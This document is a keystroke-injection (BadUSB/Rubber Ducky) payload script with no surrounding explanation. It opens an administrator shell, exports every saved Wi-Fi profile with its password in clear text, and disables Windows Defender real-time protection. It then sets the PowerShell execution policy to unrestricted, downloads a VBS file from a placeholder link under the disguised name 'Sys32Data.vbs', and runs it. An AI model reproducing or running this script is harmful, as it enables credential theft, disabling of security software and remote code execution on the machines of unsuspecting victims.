
REM let the HID enumerate

DELAY 1000

GUI r

DELAY 300

STRING cmd 

DELAY 350

CTRL-SHIFT ENTER

DELAY 2000

ALT y 

DELAY 500

STRING cd C:\

ENTER

DELAY 200

STRING md l 

ENTER

DELAY 200

REM ***  move into the new directory and export the wifi information  ***

STRING cd l && netsh wlan export profile key=clear >nul

ENTER

DELAY 1500

STRING powershell -WindowStyle hidden

ENTER

REM *** runing powershell through cmd with admin privlages, turn off windows defender, and set powerscript execution policy ***

DELAY 400

STRING Set-MpPreference -DisableRealtimeMonitoring $true

ENTER

DELAY 2000

STRING set-executionpolicy unrestricted

ENTER

DELAY 2000


GUI r

DELAY 2000

STRING powershell
ENTER

DELAY 3000

ENTER

STRING $client = new-object System.Net.WebClient
ENTER

DELAY 50
STRING $client.DownloadFile(' >>link<< ','Sys32Data.vbs')
ENTER

DELAY 50
STRING start Sys32Data.vbs
ENTER

STRING exit
ENTER


